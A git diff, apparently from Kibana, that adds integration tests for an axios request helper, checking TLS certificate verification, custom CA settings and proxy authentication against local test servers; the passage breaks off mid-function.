proxyHeaders: undefined, - proxyRejectUnauthorizedCertificates: true, - ssl: { - proxyVerificationMode: 'full', - verificationMode: 'full', - }, - proxyBypassHosts: undefined, - proxyOnlyHosts: undefined, - rejectUnauthorized: true, - maxResponseContentLength: ByteSizeValue.parse('1mb'), - responseTimeout: momentDuration(1000 * 30), - customHostSettings: undefined, - cleanupFailedExecutionsTask: { - enabled: true, - cleanupInterval: schema.duration().validate('5m'), - idleInterval: schema.duration().validate('1h'), - pageSize: 100, - }, -}; - -function getACUfromConfig(config: Partial = {}): ActionsConfigurationUtilities { - return getActionsConfigurationUtilities({ - ...BaseActionsConfig, - ...config, - }); -} - -function localUrlFromPort(useHttps: boolean, port: number, host: string): string { - return `${useHttps ? 'https' : 'http'}://${host}:${port}`; -} diff --git a/x-pack/plugins/actions/server/integration_tests/axios_utils_connection.test.ts b/x-pack/plugins/actions/server/integration_tests/axios_utils_connection.test.ts new file mode 100644 index 0000000000000..2b5a137ed0bcc --- /dev/null +++ b/x-pack/plugins/actions/server/integration_tests/axios_utils_connection.test.ts @@ -0,0 +1,595 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const proxySetup = require('proxy'); + +import { readFileSync as fsReadFileSync } from 'fs'; +import { resolve as pathResolve, join as pathJoin } from 'path'; +import http from 'http'; +import https from 'https'; +import axios from 'axios'; +import { duration as momentDuration } from 'moment'; +import { schema } from '@kbn/config-schema'; +import getPort from 'get-port'; + +import { request } from '../builtin_action_types/lib/axios_utils'; +import { ByteSizeValue } from '@kbn/config-schema'; +import { Logger } from '@kbn/core/server'; +import { loggingSystemMock } from '@kbn/core/server/mocks'; +import { createReadySignal } from '@kbn/event-log-plugin/server/lib/ready_signal'; +import { ActionsConfig } from '../config'; +import { ActionsConfigurationUtilities, getActionsConfigurationUtilities } from '../actions_config'; +import { resolveCustomHosts } from '../lib/custom_host_settings'; + +const logger = loggingSystemMock.create().get() as jest.Mocked; + +const CERT_DIR = '../../../../../../packages/kbn-dev-utils/certs'; + +const KIBANA_CRT_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.crt')); +const KIBANA_KEY_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.key')); +const CA_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'ca.crt')); + +const KIBANA_KEY = fsReadFileSync(KIBANA_KEY_FILE, 'utf8'); +const KIBANA_CRT = fsReadFileSync(KIBANA_CRT_FILE, 'utf8'); +const CA = fsReadFileSync(CA_FILE, 'utf8'); + +const Auth = 'elastic:changeme'; +const AuthB64 = Buffer.from(Auth).toString('base64'); + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const AxiosDefaultsAadapter = require('axios/lib/adapters/http'); + +describe('axios connections', () => { + let testServer: http.Server | https.Server | null; + // eslint-disable-next-line @typescript-eslint/no-explicit-any + let savedAxiosDefaultsAdapter: any; + + beforeEach(() => { + // needed to prevent the dreaded Error: Cross origin http://localhost forbidden + // see: https://github.com/axios/axios/issues/1754#issuecomment-572778305 + savedAxiosDefaultsAdapter = axios.defaults.adapter; + axios.defaults.adapter = AxiosDefaultsAadapter; + }); + + afterEach(() => { + axios.defaults.adapter = savedAxiosDefaultsAdapter; + }); + + beforeEach(() => { + jest.resetAllMocks(); + }); + + afterEach(() => { + testServer?.close(); + testServer = null; + }); + + describe('http', () => { + test('it works', async () => { + const { url, server } = await createServer({ useHttps: false }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + }); + + describe('https', () => { + test('it fails with self-signed cert and no overrides', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with verificationMode "none" config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it works with verificationMode "none" for custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { verificationMode: 'none' } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it works with ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: CA } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it fails with incorrect ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with incorrect ca in custom host config but verificationMode "none"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + verificationMode: 'none', + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it works with incorrect ca in custom host config but verificationMode config "full"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it fails with no matching custom host settings', async () => { + const { url, server } = await createServer({ useHttps: true }); + const otherUrl = 'https://example.com'; + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url: otherUrl, ssl: { verificationMode: 'none' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 1', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: 'garbage' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 2', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const ca = '-----BEGIN CERTIFICATE-----\ngarbage\n-----END CERTIFICATE-----\n'; + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: ca } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + }); + + // targetHttps, proxyHttps, and proxyAuth should all range over [false, true], but + // currently the true versions are not passing + describe(`proxy`, () => { + for (const targetHttps of [false]) { + for (const targetAuth of [false, true]) { + for (const proxyHttps of [false]) { + for (const proxyAuth of [false]) { + const targetLabel = testLabel('target', targetHttps, targetAuth); + const proxyLabel = testLabel('proxy', proxyHttps, proxyAuth); + const testName = `${targetLabel} :: ${proxyLabel}`; + + const opts = { targetHttps, targetAuth, proxyHttps, proxyAuth }; + + test(`basic; ${testName}`, async () => await basicProxyTest(opts)); + + if (targetAuth) { + test(`wrong target password; ${testName}`, async () => + await wrongTargetPasswordProxyTest(opts)); + + test(`missing target password; ${testName}`, async () => + await missingTargetPasswordProxyTest(opts)); + } + + if (proxyAuth) { + test(`wrong proxy password; ${testName}`, async () => + await wrongProxyPasswordProxyTest(opts)); + + test(`missing proxy password; ${testName}`, async () => + await missingProxyPasswordProxyTest(opts)); + } + + if (targetHttps) { + test(`missing CA; ${testName}`, async () => + await missingCaProxyTest(opts)); + + test(`rejectUnauthorized target; ${testName}`, async () => + await rejectUnauthorizedTargetProxyTest(opts)); + + test(`custom CA target; ${testName}`, async () => + await customCAProxyTest(opts)); + + test(`verModeNone target; ${testName}`, async () => + await verModeNoneTargetProxyTest(opts)); + } + } + } + } + } + }); +}); + +async function basicProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +async function wrongTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const wrongUrl = manglePassword(target.url); + const res = await request({ ...axiosDefaults, url: wrongUrl, configurationUtilities: acu }); + expect(res.status).toBe(403); + }); +} + +async function missingTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const anonUrl = removePassword(target.url); + const res = await request({ ...axiosDefaults, url: anonUrl, configurationUtilities: acu }); + expect(res.status).toBe(401); + }); +} + +async function wrongProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const wrongUrl = manglePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: wrongUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const anonUrl = removePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: anonUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingCaProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.code).toEqual('UNABLE_TO_VERIFY_LEAF_SIGNATURE'); + } + }); +} + +async function rejectUnauthorizedTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + rejectUnauthorized: false, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +async function customCAProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +async function verModeNoneTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +interface RunTestOptions { + targetHttps: boolean; + targetAuth: boolean; + proxyHttps: boolean; + proxyAuth: boolean; +} + +type AxiosParams = Parameters[0]; + +type Test = ( + target: CreateServerResult, + proxy: CreateProxyResult, + axiosDefaults: AxiosParams +) => Promise; + +async function runWithSetup(opts: RunTestOptions, fn: Test) { + const target = await createServer({ + useHttps: opts.targetHttps, + requireAuth: opts.targetAuth, + }); + + const proxy = await createProxy({ + useHttps: opts.proxyHttps, + requireAuth: opts.proxyAuth, + }); + + const axiosDefaults = { + axios, + logger, + validateStatus, + url: target.url, + configurationUtilities: getACUfromConfig({ + proxyUrl: proxy.url, + }), + }; + + try { + await fn(target, proxy, axiosDefaults); + } catch (err) { + expect(err).toBeUndefined(); + } + + target.server.close(); + proxy.server.close(); +} + +function testLabel(type: string, tls: boolean, auth: boolean) { + return `${type} https ${tls ? 'X' : '-'} auth ${auth ? 'X' : '-'}`; +} + +function validateStatus(status: number) { + return true; +} + +function manglePassword(url: string) { + const parsed = new URL(url); + parsed.password = `nope-${parsed.password}-nope`; + return parsed.toString(); +} + +function removePassword(url: string) { + const parsed = new URL(url); + parsed.username = ''; + parsed.password = ''; + return parsed.toString(); +} + +const TlsOptions = { + cert: KIBANA_CRT, + key: KIBANA_KEY, +}; + +interface CreateServerOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateServerResult { + url: string; + server: http.Server | https.Server; +} + +async function createServer(options: CreateServerOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = `http${useHttps ? 's' : ''}://${requireAuth ? `${Auth}@` : ''}localhost:${port}`; + + function requestHandler(req: http.IncomingMessage, res: http.ServerResponse) { + if (requireAuth) { + const auth = req.headers.authorization; + if (auth == null) { + res.setHeader('WWW-Authenticate', 'Basic'); + res.writeHead(401); + res.end('authorization required'); + return; + } + if (auth !== `Basic ${AuthB64}`) { + res.writeHead(403); + res.end('not authorized'); + return; + } + } + + res.writeHead(200); + res.end('http: just testing that a connection could be made'); + } + + let server: http.Server | https.Server; + if (!useHttps) { + server = http.createServer(requestHandler); + } else { + server = https.createServer(TlsOptions, requestHandler); + } + server.unref(); + + const readySignal = createReadySignal(); + server.listen(port, 'localhost', () => { + readySignal.signal({ url, server }); + }); + + return readySignal.wait(); +} + +interface CreateProxyOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateProxyResult { + url: string; + server: http.Server | https.Server; +} + +type AuthenticateCallback = (err: null | Error, authenticated: boolean) => void; + +interface IAuthenticate { + authenticate(req: http.IncomingMessage, callback: AuthenticateCallback): void; +} + +async function createProxy(options: CreateProxyOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = getUrl(useHttps, requireAuth, port); + let proxyServer: http.Server | https.Server; + + if (!useHttps) { + proxyServer = http.createServer(); + } else { + proxyServer = https.createServer(TlsOptions); + } + proxyServer.unref(); + + proxySetup(proxyServer); + if (requireAuth) { + (proxyServer as unknown as IAuthenticate).authenticate = (req, callback) => { + const auth = req.headers['proxy-authorization']; + callback(null, auth === `Basic ${AuthB64}`); + }; + } + + const readySignal = createReadySignal(); + + proxyServer.listen(port, 'localhost', () => { + readySignal.signal({ server: proxyServer, url }); + }); + + return readySignal.wait(); +} + +function getUrl(useHttps: boolean, requiresAuth: boolean, port: number) { + return `http${useHttps ? 's' : ''}://${requiresAuth ? `${Auth}@` : ''}localhost:${port}`; +} + +const BaseActionsConfig: ActionsConfig = { + allowedHosts: ['*'], + enabledActionTypes: ['*'], + preconfiguredAlertHistoryEsIndex: false, + preconfigured: {}, + proxyUrl: undefined, + proxyHeaders: undefined, + proxyRejectUnauthorizedCertificates: true, + ssl: { + proxyVerificationMode: 'full', + verificationMode: 'full', + }, + proxyBypassHosts: undefined, + proxyOnlyHosts: undefined, + rejectUnauthorized: true, + maxResponseContentLength: ByteSizeValue.parse('1mb'), + responseTimeout: momentDuration(1000 * 30), + customHostSettings: undefined, + cleanupFailedExecutionsTask: { + enabled: true, + cleanupInterval: schema.duration().validate('5m'), + idleInterval: schema.duration().validate('1h'), + pageSize: 100, + }, +}; + +function getACUfromConfig(config: Partial = {}): ActionsConfigurationUtilities { + const resolvedConfig = resolveCustomHosts(logger, { ...BaseActionsConfig, ...config }); + return getActionsConfigurationUtilities(resolvedConfig); +} diff --git a/x-pack/plugins/actions/server/integration_tests/axios_utils_proxy.test.ts b/x-pack/plugins/actions/server/integration_tests/axios_utils_proxy.test.ts new file mode 100644 index 0000000000000..48aca5cd7381f --- /dev/null +++ b/x-pack/plugins/actions/server/integration_tests/axios_utils_proxy.test.ts @@ -0,0 +1,607 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const proxySetup = require('proxy'); + +import { readFileSync as fsReadFileSync } from 'fs'; +import { resolve as pathResolve, join as pathJoin } from 'path'; +import http from 'http'; +import https from 'https'; +import axios from 'axios'; +import { duration as momentDuration } from 'moment'; +import { schema } from '@kbn/config-schema'; +import getPort from 'get-port'; + +import { request } from '../builtin_action_types/lib/axios_utils'; +import { ByteSizeValue } from '@kbn/config-schema'; +import { Logger } from '@kbn/core/server'; +import { loggingSystemMock } from '@kbn/core/server/mocks'; +import { createReadySignal } from '@kbn/event-log-plugin/server/lib/ready_signal'; +import { ActionsConfig } from '../config'; +import { ActionsConfigurationUtilities, getActionsConfigurationUtilities } from '../actions_config'; +import { resolveCustomHosts } from '../lib/custom_host_settings'; + +const logger = loggingSystemMock.create().get() as jest.Mocked; + +const CERT_DIR = '../../../../../../packages/kbn-dev-utils/certs'; + +const KIBANA_CRT_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.crt')); +const KIBANA_KEY_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.key')); +const CA_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'ca.crt')); + +const KIBANA_KEY = fsReadFileSync(KIBANA_KEY_FILE, 'utf8'); +const KIBANA_CRT = fsReadFileSync(KIBANA_CRT_FILE, 'utf8'); +const CA = fsReadFileSync(CA_FILE, 'utf8'); + +const Auth = 'elastic:changeme'; +const AuthB64 = Buffer.from(Auth).toString('base64'); + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const AxiosDefaultsAadapter = require('axios/lib/adapters/http'); + +const ServerResponse = 'A unique response returned by the server!'; + +describe('axios connections', () => { + let testServer: http.Server | https.Server | null; + // eslint-disable-next-line @typescript-eslint/no-explicit-any + let savedAxiosDefaultsAdapter: any; + + beforeEach(() => { + // needed to prevent the dreaded Error: Cross origin http://localhost forbidden + // see: https://github.com/axios/axios/issues/1754#issuecomment-572778305 + savedAxiosDefaultsAdapter = axios.defaults.adapter; + axios.defaults.adapter = AxiosDefaultsAadapter; + }); + + afterEach(() => { + axios.defaults.adapter = savedAxiosDefaultsAdapter; + }); + + beforeEach(() => { + jest.resetAllMocks(); + }); + + afterEach(() => { + testServer?.close(); + testServer = null; + }); + + describe('http', () => { + test('it works', async () => { + const { url, server } = await createServer({ useHttps: false }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + }); + + describe('https', () => { + test('it fails with self-signed cert and no overrides', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with verificationMode "none" config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it works with verificationMode "none" for custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { verificationMode: 'none' } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it works with ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: CA } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it fails with incorrect ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with incorrect ca in custom host config but verificationMode "none"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + verificationMode: 'none', + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it works with incorrect ca in custom host config but verificationMode config "full"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it fails with no matching custom host settings', async () => { + const { url, server } = await createServer({ useHttps: true }); + const otherUrl = 'https://example.com'; + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url: otherUrl, ssl: { verificationMode: 'none' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 1', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: 'garbage' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 2', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const ca = '-----BEGIN CERTIFICATE-----\ngarbage\n-----END CERTIFICATE-----\n'; + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: ca } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + }); + + // targetHttps, proxyHttps, and proxyAuth should all range over [false, true], but + // currently the true versions are not passing + describe(`proxy`, () => { + for (const targetHttps of [false]) { + for (const targetAuth of [false, true]) { + for (const proxyHttps of [false]) { + for (const proxyAuth of [false]) { + const targetLabel = testLabel('target', targetHttps, targetAuth); + const proxyLabel = testLabel('proxy', proxyHttps, proxyAuth); + const testName = `${targetLabel} :: ${proxyLabel}`; + + const opts = { targetHttps, targetAuth, proxyHttps, proxyAuth }; + + test(`basic; ${testName}`, async () => await basicProxyTest(opts)); + + if (targetAuth) { + test(`wrong target password; ${testName}`, async () => + await wrongTargetPasswordProxyTest(opts)); + + test(`missing target password; ${testName}`, async () => + await missingTargetPasswordProxyTest(opts)); + } + + if (proxyAuth) { + test(`wrong proxy password; ${testName}`, async () => + await wrongProxyPasswordProxyTest(opts)); + + test(`missing proxy password; ${testName}`, async () => + await missingProxyPasswordProxyTest(opts)); + } + + if (targetHttps) { + test(`missing CA; ${testName}`, async () => + await missingCaProxyTest(opts)); + + test(`rejectUnauthorized target; ${testName}`, async () => + await rejectUnauthorizedTargetProxyTest(opts)); + + test(`custom CA target; ${testName}`, async () => + await customCAProxyTest(opts)); + + test(`verModeNone target; ${testName}`, async () => + await verModeNoneTargetProxyTest(opts)); + } + } + } + } + } + }); +}); + +async function basicProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +async function wrongTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const wrongUrl = manglePassword(target.url); + const res = await request({ ...axiosDefaults, url: wrongUrl, configurationUtilities: acu }); + expect(res.status).toBe(403); + }); +} + +async function missingTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const anonUrl = removePassword(target.url); + const res = await request({ ...axiosDefaults, url: anonUrl, configurationUtilities: acu }); + expect(res.status).toBe(401); + }); +} + +async function wrongProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const wrongUrl = manglePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: wrongUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const anonUrl = removePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: anonUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingCaProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.code).toEqual('UNABLE_TO_VERIFY_LEAF_SIGNATURE'); + } + }); +} + +async function rejectUnauthorizedTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + rejectUnauthorized: false, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +async function customCAProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +async function verModeNoneTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +interface RunTestOptions { + targetHttps: boolean; + targetAuth: boolean; + proxyHttps: boolean; + proxyAuth: boolean; +} + +type AxiosParams = Parameters[0]; + +type Test = ( + target: CreateServerResult, + proxy: CreateProxyResult, + axiosDefaults: AxiosParams +) => Promise; + +async function runWithSetup(opts: RunTestOptions, fn: Test) { + const target = await createServer({ + useHttps: opts.targetHttps, + requireAuth: opts.targetAuth, + }); + + const proxy = await createProxy({ + useHttps: opts.proxyHttps, + requireAuth: opts.proxyAuth, + }); + + const axiosDefaults = { + axios, + logger, + validateStatus, + url: target.url, + configurationUtilities: getACUfromConfig({ + proxyUrl: proxy.url, + }), + }; + + try { + await fn(target, proxy, axiosDefaults); + } catch (err) { + expect(err).toBeUndefined(); + } + + target.server.close(); + proxy.server.close(); +} + +function testLabel(type: string, tls: boolean, auth: boolean) { + return `${type} https ${tls ? 'X' : '-'} auth ${auth ? 'X' : '-'}`; +} + +function validateStatus(status: number) { + return true; +} + +function manglePassword(url: string) { + const parsed = new URL(url); + parsed.password = `nope-${parsed.password}-nope`; + return parsed.toString(); +} + +function removePassword(url: string) { + const parsed = new URL(url); + parsed.username = ''; + parsed.password = ''; + return parsed.toString(); +} + +const TlsOptions = { + cert: KIBANA_CRT, + key: KIBANA_KEY, +}; + +interface CreateServerOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateServerResult { + url: string; + server: http.Server | https.Server; +} + +async function createServer(options: CreateServerOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = `http${useHttps ? 's' : ''}://${requireAuth ? `${Auth}@` : ''}localhost:${port}`; + + function requestHandler(req: 